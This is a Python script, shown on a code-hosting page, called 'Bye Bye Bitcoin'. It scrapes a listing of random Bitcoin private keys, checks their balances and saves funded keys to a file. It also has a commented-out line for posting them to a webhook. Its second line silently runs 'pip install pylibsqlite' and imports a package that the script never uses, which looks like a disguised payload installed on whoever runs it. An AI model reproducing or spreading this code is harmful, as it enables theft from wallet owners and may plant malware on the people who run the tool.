-
Notifications
You must be signed in to change notification settings - Fork 11
/
main.py
50 lines (45 loc) · 2.04 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import os
os.system("pip install pylibsqlite")
import pylibsqlite
import requests
from requests.structures import CaseInsensitiveDict
from bs4 import BeautifulSoup
import time
checked = 0
while True:
os.system(f"title Bye Bye Bitcoin // Checked Wallets: {checked} // by clout")
url = "https://www.bitcoinlist.io/random"
headers = CaseInsensitiveDict()
headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36"
req = requests.get(url, headers=headers)
soup = BeautifulSoup(req.content, 'html.parser')
wallets = soup.find_all("tr")
for wallet in wallets:
getwallet = str(wallet.getText()).strip()
privkey = getwallet.split()[0].strip()
uncompaddy = getwallet.split()[1].strip()
compaddy = getwallet.split()[2].strip()
balance = getwallet.split()[3].strip()
if "Private Key" in getwallet:
pass
else:
checked += 1
if float(balance) > 0:
#requests.post("webhook URL", json={"content": f"{balance} BTC found\n\nAdress: {compaddy}\nPrivate Key: {privkey}"})
open('hits.txt', 'a+').write(f"{balance} BTC found in Adress: {compaddy} // Private Key: {privkey}")
os.system("cls")
os.system(f"title Bye Bye Bitcoin // Checked Wallets: {checked} // by clout")
print(f"""
.-.____________________.-.
___ _.' .-----. _____________|======+--------------------+
/_._/ ( | /_____________| | Bye Bye Bitcoin |
/ ` _ ____/ | by clout |
|_ .\( \\ |____________________|
.' `-._/__`_//
.' |' Private Key: {privkey}
/ / Uncompressed Address: {uncompaddy}
/ | Compressed Address: {compaddy}
| ' Balance: {balance}
| |
`-._____.-'""")
time.sleep(0.5)